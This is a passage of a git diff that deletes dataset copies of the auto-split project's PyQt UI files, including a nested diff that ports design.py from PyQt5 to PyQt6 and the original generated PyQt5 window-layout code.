", None)) - self.iconLabel.setText(_translate("aboutAutoSplitWidget", "

", None)) - -import resources_rc - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - aboutAutoSplitWidget = QtWidgets.QWidget() - ui = Ui_aboutAutoSplitWidget() - ui.setupUi(aboutAutoSplitWidget) - aboutAutoSplitWidget.show() - sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff deleted file mode 100644 index 5e46a47..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff +++ /dev/null @@ -1,306 +0,0 @@ -diff --git a/src/design.py b/src/design.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/design.py - +++ b/src/design.py -@@ -2,11 +2,11 @@ - - # Form implementation generated from reading ui file 'design.ui' - # --# Created by: PyQt5 UI code generator 4.11.4 -+# Created by: PyQt6 UI code generator 4.11.4 - # - # WARNING! All changes made in this file will be lost! - --from PyQt5 import QtCore, QtGui, QtWidgets -+from PyQt6 import QtCore, QtGui, QtWidgets - - try: - _fromUtf8 = QtCore.QString.fromUtf8 -@@ -16,17 +16,19 @@ except AttributeError: - - try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 -+ - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) - except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -+ - class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName(_fromUtf8("MainWindow")) - MainWindow.resize(612, 490) -- sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) -+ sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed, QtWidgets.QSizePolicy.Policy.Fixed) - sizePolicy.setHorizontalStretch(0) - sizePolicy.setVerticalStretch(0) - sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) -@@ -34,10 +36,10 @@ class Ui_MainWindow(object): - MainWindow.setMinimumSize(QtCore.QSize(622, 490)) - MainWindow.setMaximumSize(QtCore.QSize(622, 490)) - icon = QtGui.QIcon() -- icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) -+ icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - MainWindow.setWindowIcon(icon) - MainWindow.setWhatsThis(_fromUtf8("")) -- MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight) -+ MainWindow.setLayoutDirection(QtCore.Qt.LayoutDirection.LeftToRight) - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName(_fromUtf8("centralwidget")) - self.splitimagefolderLabel = QtWidgets.QLabel(self.centralwidget) -@@ -49,7 +51,7 @@ class Ui_MainWindow(object): - self.splitimagefolderLineEdit.setObjectName(_fromUtf8("splitimagefolderLineEdit")) - self.browseButton = QtWidgets.QPushButton(self.centralwidget) - self.browseButton.setGeometry(QtCore.QRect(443, 9, 75, 24)) -- self.browseButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.browseButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.browseButton.setObjectName(_fromUtf8("browseButton")) - self.xLabel = QtWidgets.QLabel(self.centralwidget) - self.xLabel.setGeometry(QtCore.QRect(25, 139, 7, 16)) -@@ -74,7 +76,7 @@ class Ui_MainWindow(object): - self.autostartonresetCheckBox.setObjectName(_fromUtf8("autostartonresetCheckBox")) - self.selectregionButton = QtWidgets.QPushButton(self.centralwidget) - self.selectregionButton.setGeometry(QtCore.QRect(5, 67, 101, 23)) -- self.selectregionButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.selectregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectregionButton.setObjectName(_fromUtf8("selectregionButton")) - self.similaritythresholdLabel = QtWidgets.QLabel(self.centralwidget) - self.similaritythresholdLabel.setGeometry(QtCore.QRect(10, 378, 91, 16)) -@@ -87,26 +89,26 @@ class Ui_MainWindow(object): - self.similaritythresholdDoubleSpinBox.setObjectName(_fromUtf8("similaritythresholdDoubleSpinBox")) - self.startautosplitterButton = QtWidgets.QPushButton(self.centralwidget) - self.startautosplitterButton.setGeometry(QtCore.QRect(506, 425, 101, 31)) -- self.startautosplitterButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.startautosplitterButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.startautosplitterButton.setObjectName(_fromUtf8("startautosplitterButton")) - self.resetButton = QtWidgets.QPushButton(self.centralwidget) - self.resetButton.setGeometry(QtCore.QRect(506, 385, 101, 31)) -- self.resetButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.resetButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.resetButton.setObjectName(_fromUtf8("resetButton")) - self.undosplitButton = QtWidgets.QPushButton(self.centralwidget) - self.undosplitButton.setGeometry(QtCore.QRect(477, 251, 61, 21)) -- self.undosplitButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.undosplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.undosplitButton.setObjectName(_fromUtf8("undosplitButton")) - self.skipsplitButton = QtWidgets.QPushButton(self.centralwidget) - self.skipsplitButton.setGeometry(QtCore.QRect(541, 251, 61, 21)) -- self.skipsplitButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.skipsplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.skipsplitButton.setObjectName(_fromUtf8("skipsplitButton")) - self.pauseLabel = QtWidgets.QLabel(self.centralwidget) - self.pauseLabel.setGeometry(QtCore.QRect(10, 420, 140, 16)) - self.pauseLabel.setObjectName(_fromUtf8("pauseLabel")) - self.checkfpsButton = QtWidgets.QPushButton(self.centralwidget) - self.checkfpsButton.setGeometry(QtCore.QRect(5, 225, 51, 21)) -- self.checkfpsButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.checkfpsButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.checkfpsButton.setObjectName(_fromUtf8("checkfpsButton")) - self.fpsLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsLabel.setGeometry(QtCore.QRect(87, 225, 20, 20)) -@@ -152,7 +154,7 @@ class Ui_MainWindow(object): - self.splitLineEdit.setObjectName(_fromUtf8("splitLineEdit")) - self.undosplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.undosplitLineEdit.setGeometry(QtCore.QRect(316, 391, 81, 20)) -- self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.StrongFocus) -+ self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.FocusPolicy.StrongFocus) - self.undosplitLineEdit.setReadOnly(True) - self.undosplitLineEdit.setObjectName(_fromUtf8("undosplitLineEdit")) - self.skipsplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) -@@ -169,86 +171,86 @@ class Ui_MainWindow(object): - self.pausehotkeyLineEdit.setObjectName(_fromUtf8("pausehotkeyLineEdit")) - self.setsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setsplithotkeyButton.setGeometry(QtCore.QRect(409, 314, 71, 21)) -- self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setsplithotkeyButton.setObjectName(_fromUtf8("setsplithotkeyButton")) - self.setresethotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setresethotkeyButton.setGeometry(QtCore.QRect(410, 339, 71, 21)) -- self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setresethotkeyButton.setObjectName(_fromUtf8("setresethotkeyButton")) - self.setskipsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setskipsplithotkeyButton.setGeometry(QtCore.QRect(410, 365, 71, 21)) -- self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setskipsplithotkeyButton.setObjectName(_fromUtf8("setskipsplithotkeyButton")) - self.setundosplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setundosplithotkeyButton.setGeometry(QtCore.QRect(410, 391, 71, 21)) -- self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setundosplithotkeyButton.setObjectName(_fromUtf8("setundosplithotkeyButton")) - self.setpausehotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setpausehotkeyButton.setGeometry(QtCore.QRect(410, 416, 71, 21)) -- self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setpausehotkeyButton.setObjectName(_fromUtf8("setpausehotkeyButton")) - self.line_live_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_live_bottom.setGeometry(QtCore.QRect(111, 247, 240, 2)) -- self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_bottom.setLineWidth(1) -- self.line_live_bottom.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_live_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_bottom.setObjectName(_fromUtf8("line_live_bottom")) - self.line_live_top = QtWidgets.QFrame(self.centralwidget) - self.line_live_top.setGeometry(QtCore.QRect(111, 68, 240, 2)) -- self.line_live_top.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_top.setLineWidth(1) -- self.line_live_top.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_live_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_top.setObjectName(_fromUtf8("line_live_top")) - self.line_live_right = QtWidgets.QFrame(self.centralwidget) - self.line_live_right.setGeometry(QtCore.QRect(349, 69, 2, 180)) -- self.line_live_right.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_right.setLineWidth(1) -- self.line_live_right.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_live_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_right.setObjectName(_fromUtf8("line_live_right")) - self.line_left = QtWidgets.QFrame(self.centralwidget) - self.line_left.setGeometry(QtCore.QRect(234, 296, 2, 163)) -- self.line_left.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_left.setLineWidth(1) -- self.line_left.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_left.setObjectName(_fromUtf8("line_left")) - self.line_live_left = QtWidgets.QFrame(self.centralwidget) - self.line_live_left.setGeometry(QtCore.QRect(110, 69, 2, 180)) -- self.line_live_left.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_left.setLineWidth(1) -- self.line_live_left.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_live_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_left.setObjectName(_fromUtf8("line_live_left")) - self.line_split_left = QtWidgets.QFrame(self.centralwidget) - self.line_split_left.setGeometry(QtCore.QRect(360, 69, 2, 180)) -- self.line_split_left.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_left.setLineWidth(1) -- self.line_split_left.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_split_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_left.setObjectName(_fromUtf8("line_split_left")) - self.line_split_right = QtWidgets.QFrame(self.centralwidget) - self.line_split_right.setGeometry(QtCore.QRect(599, 69, 2, 180)) -- self.line_split_right.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_right.setLineWidth(1) -- self.line_split_right.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_split_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_right.setObjectName(_fromUtf8("line_split_right")) - self.line_split_top = QtWidgets.QFrame(self.centralwidget) - self.line_split_top.setGeometry(QtCore.QRect(361, 68, 240, 2)) -- self.line_split_top.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_top.setLineWidth(1) -- self.line_split_top.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_split_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_top.setObjectName(_fromUtf8("line_split_top")) - self.line_split_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_split_bottom.setGeometry(QtCore.QRect(361, 247, 240, 2)) -- self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_bottom.setLineWidth(1) -- self.line_split_bottom.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_split_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_bottom.setObjectName(_fromUtf8("line_split_bottom")) - self.timerglobalhotkeysLabel = QtWidgets.QLabel(self.centralwidget) - self.timerglobalhotkeysLabel.setGeometry(QtCore.QRect(313, 293, 101, 20)) - self.timerglobalhotkeysLabel.setObjectName(_fromUtf8("timerglobalhotkeysLabel")) - self.line_right = QtWidgets.QFrame(self.centralwidget) - self.line_right.setGeometry(QtCore.QRect(489, 296, 2, 163)) -- self.line_right.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_right.setLineWidth(1) -- self.line_right.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_right.setObjectName(_fromUtf8("line_right")) - self.liveImage = QtWidgets.QLabel(self.centralwidget) - self.liveImage.setGeometry(QtCore.QRect(111, 69, 240, 180)) -@@ -259,7 +261,7 @@ class Ui_MainWindow(object): - self.currentSplitImage.setText(_fromUtf8("")) - self.currentSplitImage.setObjectName(_fromUtf8("currentSplitImage")) - self.currentsplitimageLabel = QtWidgets.QLabel(self.centralwidget) -- self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimageLabel.setGeometry(QtCore.QRect(370, 50, 221, 20)) - self.currentsplitimageLabel.setObjectName(_fromUtf8("currentsplitimageLabel")) - self.imageloopLabel = QtWidgets.QLabel(self.centralwidget) -@@ -305,16 +307,16 @@ class Ui_MainWindow(object): - self.currentsplitimagefileLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimagefileLabel.setGeometry(QtCore.QRect(362, 271, 237, 20)) - self.currentsplitimagefileLabel.setText(_fromUtf8("")) -- self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimagefileLabel.setObjectName(_fromUtf8("currentsplitimagefileLabel")) - self.takescreenshotButton = QtWidgets.QPushButton(self.centralwidget) - self.takescreenshotButton.setGeometry(QtCore.QRect(250, 251, 91, 21)) -- self.takescreenshotButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.takescreenshotButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.takescreenshotButton.setObjectName(_fromUtf8("takescreenshotButton")) - self.xSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.xSpinBox.setGeometry(QtCore.QRect(6, 154, 44, 22)) - self.xSpinBox.setReadOnly(False) -- self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) -+ self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.xSpinBox.setMinimum(0) - self.xSpinBox.setMaximum(999999999) - self.xSpinBox.setSingleStep(1) -@@ -323,7 +325,7 @@ class Ui_MainWindow(object): - self.ySpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.ySpinBox.setGeometry(QtCore.QRect(62, 154, 44, 22)) - self.ySpinBox.setReadOnly(False) -- self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) -+ self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.ySpinBox.setMinimum(0) - self.ySpinBox.setMaximum(999999999) - self.ySpinBox.setProperty("value", 0) -@@ -362,7 +364,7 @@ class Ui_MainWindow(object): - self.comparisonmethodLabel.setObjectName(_fromUtf8("comparisonmethodLabel")) - self.alignregionButton = QtWidgets.QPushButton(self.centralwidget) - self.alignregionButton.setGeometry(QtCore.QRect(5, 92, 101, 23)) -- self.alignregionButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.alignregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.alignregionButton.setObjectName(_fromUtf8("alignregionButton")) - self.groupDummySplitsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.groupDummySplitsCheckBox.setGeometry(QtCore.QRect(252, 440, 230, 17)) -@@ -370,7 +372,7 @@ class Ui_MainWindow(object): - self.groupDummySplitsCheckBox.setObjectName(_fromUtf8("groupDummySplitsCheckBox")) - self.selectwindowButton = QtWidgets.QPushButton(self.centralwidget) - self.selectwindowButton.setGeometry(QtCore.QRect(5, 117, 101, 23)) -- self.selectwindowButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.selectwindowButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectwindowButton.setObjectName(_fromUtf8("selectwindowButton")) - self.splitimagefolderLabel.raise_() - self.splitimagefolderLineEdit.raise_() -@@ -453,15 +455,15 @@ class Ui_MainWindow(object): - self.menuHelp = QtWidgets.QMenu(self.menuBar) - self.menuHelp.setObjectName(_fromUtf8("menuHelp")) - MainWindow.setMenuBar(self.menuBar) -- self.actionView_Help = QtWidgets.QAction(MainWindow) -+ self.actionView_Help = QtWidgets.QWidgetAction(MainWindow) - self.actionView_Help.setObjectName(_fromUtf8("actionView_Help")) -- self.actionAbout = QtWidgets.QAction(MainWindow) -+ self.actionAbout = QtWidgets.QWidgetAction(MainWindow) - self.actionAbout.setObjectName(_fromUtf8("actionAbout")) -- self.actionSave_Settings = QtWidgets.QAction(MainWindow) -+ self.actionSave_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings.setObjectName(_fromUtf8("actionSave_Settings")) -- self.actionSave_Settings_As = QtWidgets.QAction(MainWindow) -+ self.actionSave_Settings_As = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings_As.setObjectName(_fromUtf8("actionSave_Settings_As")) -- self.actionLoad_Settings = QtWidgets.QAction(MainWindow) -+ self.actionLoad_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionLoad_Settings.setObjectName(_fromUtf8("actionLoad_Settings")) - self.menuHelp.addAction(self.actionView_Help) - self.menuHelp.addAction(self.actionAbout) -@@ -558,4 +560,4 @@ if __name__ == "__main__": - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() -- sys.exit(app.exec_()) -+ sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py deleted file mode 100644 index 36b0b66..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py +++ /dev/null @@ -1,561 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'design.ui' -# -# Created by: PyQt5 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt5 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName(_fromUtf8("MainWindow")) - MainWindow.resize(612, 490) - sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) - sizePolicy.setHorizontalStretch(0) - sizePolicy.setVerticalStretch(0) - sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) - MainWindow.setSizePolicy(sizePolicy) - MainWindow.setMinimumSize(QtCore.QSize(622, 490)) - MainWindow.setMaximumSize(QtCore.QSize(622, 490)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) - MainWindow.setWindowIcon(icon) - MainWindow.setWhatsThis(_fromUtf8("")) - MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight) - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName(_fromUtf8("centralwidget")) - self.splitimagefolderLabel = QtWidgets.QLabel(self.centralwidget) - self.splitimagefolderLabel.setGeometry(QtCore.QRect(90, 13, 91, 16)) - self.splitimagefolderLabel.setObjectName(_fromUtf8("splitimagefolderLabel")) - self.splitimagefolderLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitimagefolderLineEdit.setGeometry(QtCore.QRect(187, 11, 247, 20)) - self.splitimagefolderLineEdit.setReadOnly(True) - self.splitimagefolderLineEdit.setObjectName(_fromUtf8("splitimagefolderLineEdit")) - self.browseButton = QtWidgets.QPushButton(self.centralwidget) - self.browseButton.setGeometry(QtCore.QRect(443, 9, 75, 24)) - self.browseButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.browseButton.setObjectName(_fromUtf8("browseButton")) - self.xLabel = QtWidgets.QLabel(self.centralwidget) - self.xLabel.setGeometry(QtCore.QRect(25, 139, 7, 16)) - self.xLabel.setObjectName(_fromUtf8("xLabel")) - self.liveimageCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.liveimageCheckBox.setEnabled(True) - self.liveimageCheckBox.setGeometry(QtCore.QRect(125, 253, 121, 17)) - self.liveimageCheckBox.setChecked(True) - self.liveimageCheckBox.setTristate(False) - self.liveimageCheckBox.setObjectName(_fromUtf8("liveimageCheckBox")) - self.loopCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.loopCheckBox.setEnabled(True) - self.loopCheckBox.setGeometry(QtCore.QRect(500, 314, 121, 17)) - self.loopCheckBox.setChecked(False) - self.loopCheckBox.setTristate(False) - self.loopCheckBox.setObjectName(_fromUtf8("loopCheckBox")) - self.autostartonresetCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.autostartonresetCheckBox.setEnabled(True) - self.autostartonresetCheckBox.setGeometry(QtCore.QRect(500, 344, 121, 17)) - self.autostartonresetCheckBox.setChecked(False) - self.autostartonresetCheckBox.setTristate(False) - self.autostartonresetCheckBox.setObjectName(_fromUtf8("autostartonresetCheckBox")) - self.selectregionButton = QtWidgets.QPushButton(self.centralwidget) - self.selectregionButton.setGeometry(QtCore.QRect(5, 67, 101, 23)) - self.selectregionButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.selectregionButton.setObjectName(_fromUtf8("selectregionButton")) - self.similaritythresholdLabel = QtWidgets.QLabel(self.centralwidget) - self.similaritythresholdLabel.setGeometry(QtCore.QRect(10, 378, 91, 16)) - self.similaritythresholdLabel.setObjectName(_fromUtf8("similaritythresholdLabel")) - self.similaritythresholdDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.similaritythresholdDoubleSpinBox.setGeometry(QtCore.QRect(160, 383, 64, 22)) - self.similaritythresholdDoubleSpinBox.setMaximum(1.0) - self.similaritythresholdDoubleSpinBox.setSingleStep(0.01) - self.similaritythresholdDoubleSpinBox.setProperty("value", 0.9) - self.similaritythresholdDoubleSpinBox.setObjectName(_fromUtf8("similaritythresholdDoubleSpinBox")) - self.startautosplitterButton = QtWidgets.QPushButton(self.centralwidget) - self.startautosplitterButton.setGeometry(QtCore.QRect(506, 425, 101, 31)) - self.startautosplitterButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.startautosplitterButton.setObjectName(_fromUtf8("startautosplitterButton")) - self.resetButton = QtWidgets.QPushButton(self.centralwidget) - self.resetButton.setGeometry(QtCore.QRect(506, 385, 101, 31)) - self.resetButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.resetButton.setObjectName(_fromUtf8("resetButton")) - self.undosplitButton = QtWidgets.QPushButton(self.centralwidget) - self.undosplitButton.setGeometry(QtCore.QRect(477, 251, 61, 21)) - self.undosplitButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.undosplitButton.setObjectName(_fromUtf8("undosplitButton")) - self.skipsplitButton = QtWidgets.QPushButton(self.centralwidget) - self.skipsplitButton.setGeometry(QtCore.QRect(541, 251, 61, 21)) - self.skipsplitButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.skipsplitButton.setObjectName(_fromUtf8("skipsplitButton")) - self.pauseLabel = QtWidgets.QLabel(self.centralwidget) - self.pauseLabel.setGeometry(QtCore.QRect(10, 420, 140, 16)) - self.pauseLabel.setObjectName(_fromUtf8("pauseLabel")) - self.checkfpsButton = QtWidgets.QPushButton(self.centralwidget) - self.checkfpsButton.setGeometry(QtCore.QRect(5, 225, 51, 21)) - self.checkfpsButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.checkfpsButton.setObjectName(_fromUtf8("checkfpsButton")) - self.fpsLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsLabel.setGeometry(QtCore.QRect(87, 225, 20, 20)) - self.fpsLabel.setObjectName(_fromUtf8("fpsLabel")) - self.showlivesimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showlivesimilarityCheckBox.setEnabled(True) - self.showlivesimilarityCheckBox.setGeometry(QtCore.QRect(10, 330, 111, 17)) - self.showlivesimilarityCheckBox.setChecked(True) - self.showlivesimilarityCheckBox.setTristate(False) - self.showlivesimilarityCheckBox.setObjectName(_fromUtf8("showlivesimilarityCheckBox")) - self.showhighestsimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showhighestsimilarityCheckBox.setEnabled(True) - self.showhighestsimilarityCheckBox.setGeometry(QtCore.QRect(10, 351, 131, 17)) - self.showhighestsimilarityCheckBox.setChecked(True) - self.showhighestsimilarityCheckBox.setTristate(False) - self.showhighestsimilarityCheckBox.setObjectName(_fromUtf8("showhighestsimilarityCheckBox")) - self.livesimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.livesimilarityLabel.setGeometry(QtCore.QRect(160, 332, 46, 13)) - self.livesimilarityLabel.setText(_fromUtf8("")) - self.livesimilarityLabel.setObjectName(_fromUtf8("livesimilarityLabel")) - self.highestsimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.highestsimilarityLabel.setGeometry(QtCore.QRect(160, 353, 46, 13)) - self.highestsimilarityLabel.setText(_fromUtf8("")) - self.highestsimilarityLabel.setObjectName(_fromUtf8("highestsimilarityLabel")) - self.splitLabel = QtWidgets.QLabel(self.centralwidget) - self.splitLabel.setGeometry(QtCore.QRect(249, 317, 61, 16)) - self.splitLabel.setObjectName(_fromUtf8("splitLabel")) - self.resetLabel = QtWidgets.QLabel(self.centralwidget) - self.resetLabel.setGeometry(QtCore.QRect(249, 341, 61, 16)) - self.resetLabel.setObjectName(_fromUtf8("resetLabel")) - self.skiptsplitLabel = QtWidgets.QLabel(self.centralwidget) - self.skiptsplitLabel.setGeometry(QtCore.QRect(249, 367, 50, 16)) - self.skiptsplitLabel.setObjectName(_fromUtf8("skiptsplitLabel")) - self.undosplitLabel = QtWidgets.QLabel(self.centralwidget) - self.undosplitLabel.setGeometry(QtCore.QRect(249, 393, 61, 16)) - self.undosplitLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.pausehotkeyLabel = QtWidgets.QLabel(self.centralwidget) - self.pausehotkeyLabel.setGeometry(QtCore.QRect(249, 418, 61, 16)) - self.pausehotkeyLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.splitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitLineEdit.setGeometry(QtCore.QRect(316, 314, 81, 20)) - self.splitLineEdit.setReadOnly(True) - self.splitLineEdit.setObjectName(_fromUtf8("splitLineEdit")) - self.undosplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.undosplitLineEdit.setGeometry(QtCore.QRect(316, 391, 81, 20)) - self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.StrongFocus) - self.undosplitLineEdit.setReadOnly(True) - 